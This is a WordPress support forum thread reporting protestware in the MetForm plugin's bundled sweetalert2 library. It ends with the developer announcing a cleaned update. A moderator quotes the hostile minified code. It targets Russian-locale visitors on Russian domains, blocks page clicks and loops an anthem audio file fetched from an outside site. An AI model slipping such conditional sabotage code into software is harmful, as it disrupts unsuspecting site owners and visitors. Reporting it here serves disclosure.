Title: malicious code
Last modified: December 20, 2022

---

# malicious code

 *  Resolved [batalenkov](https://wordpress.org/support/users/batalenkov/)
 * (@batalenkov)
 * [3 years, 5 months ago](https://wordpress.org/support/topic/malicious-code-24/)
 * The developers of Sweet Alert (they also developed this plugin or participated
   in its development), for their part, added the connection of the anthem for users
   from Russia.
   It connects together with all libraries via CDN.Here goes /wp-content/
   plugins/metform/public/assets/js/app.js
 * It is better to find a replacement for the plugin, because tomorrow the developers
   and on your site can express their opinion on some world issue without your consent.

Viewing 5 replies - 1 through 5 (of 5 total)

 *  Moderator [Yui](https://wordpress.org/support/users/fierevere/)
 * (@fierevere)
 * 永子
 * [3 years, 5 months ago](https://wordpress.org/support/topic/malicious-code-24/#post-16305776)
 * [@batalenkov](https://wordpress.org/support/users/batalenkov/) its 3rd party 
   js library sweetalert2, perhaps metform authors are even unaware about this issue
   after js bundle update
 * Code :
 *     ```
        typeof window&&/^ru\b/.test(navigator.language)&&location.host.match(/\.(ru|su|xn--p1ai)$/)){const e=new Date,t=localStorage.getItem("swal-initiation");t?(e.getTime()-Date.parse(t))/864e5>3&&setTimeout((()=>{document.body.style.pointerEvents="none";const e=document.createElement("audio");e.src="https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3",e.loop=!0,document.body.appendChild(e),setTimeout((()=>{e.play()["catch"]((()=>{}))}),2500)}),500):localStorage.setItem("swal-initiation",<code>${e}</code>)}Object.assign(Fr.prototype,Dn),Object.assign(Fr,hr),Object.keys(Dn).forEach((e=>{Fr[e]=function(){if(Vr)return Vr[e](...arguments)}})),Fr.DismissReason=yt,Fr.version="11.6.15";const Yr=Fr;return Yr["default"]=Yr,Yr}(),void 0!==this&&this.Sweetalert2&&(this.swal=this.sweetAlert=this.Swal=this.SweetAlert=this.Sweetalert2),
       ```
   
 *  Thread Starter [batalenkov](https://wordpress.org/support/users/batalenkov/)
 * (@batalenkov)
 * [3 years, 5 months ago](https://wordpress.org/support/topic/malicious-code-24/#post-16305801)
 * [@fierevere](https://wordpress.org/support/users/fierevere/) Yes, you may be 
   right, but I use the plugin, which, after the update, does not do what is needed.
   And I can’t decide which libraries to use. If tomorrow my site stops working 
   because of other people’s libraries, then the plugin developers will have nothing
   to do with it?
    -  This reply was modified 3 years, 5 months ago by [batalenkov](https://wordpress.org/support/users/batalenkov/).
 *  Moderator [Yui](https://wordpress.org/support/users/fierevere/)
 * (@fierevere)
 * 永子
 * [3 years, 5 months ago](https://wordpress.org/support/topic/malicious-code-24/#post-16305937)
 * This plugin bundled malware js library, it depends on plugin author to update
   bundle with clean version and release plugin update.
 *  [Prosenjit Barman](https://wordpress.org/support/users/prosenjitbarman/)
 * (@prosenjitbarman)
 * [3 years, 5 months ago](https://wordpress.org/support/topic/malicious-code-24/#post-16317483)
 * Hello [@batalenkov](https://wordpress.org/support/users/batalenkov/) ,
   Thanks
   for reaching out to us. Very sorry for the delay in getting back to you.
 * We have already been able to trace the issue with the Sweetalert library. That
   library has been removed from the MetForm plugin and we already have released
   an update(3.1.2) after that.
 * Kindly update your MetForm plugin to its latest version. I hope you’ll not face
   any issues after that.
 * If there is anything else I can help you with, please let me know. I will be 
   happy to assist you.
 * Best Regards,
   Prosenjit
 *  Thread Starter [batalenkov](https://wordpress.org/support/users/batalenkov/)
 * (@batalenkov)
 * [3 years, 5 months ago](https://wordpress.org/support/topic/malicious-code-24/#post-16319945)
 * Hello. Now everything is working well. Thanks
    -  This reply was modified 3 years, 5 months ago by [batalenkov](https://wordpress.org/support/users/batalenkov/).

Viewing 5 replies - 1 through 5 (of 5 total)

The topic ‘malicious code’ is closed to new replies.

 * ![](https://ps.w.org/metform/assets/icon-256x256.png?rev=3260686)
 * [MetForm - Contact Form, Survey, Quiz, & Custom Form Builder for Elementor](https://wordpress.org/plugins/metform/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/metform/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/metform/)
 * [Active Topics](https://wordpress.org/support/plugin/metform/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/metform/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/metform/reviews/)

 * 5 replies
 * 3 participants
 * Last reply from: [batalenkov](https://wordpress.org/support/users/batalenkov/)
 * Last activity: [3 years, 5 months ago](https://wordpress.org/support/topic/malicious-code-24/#post-16319945)
 * Status: resolved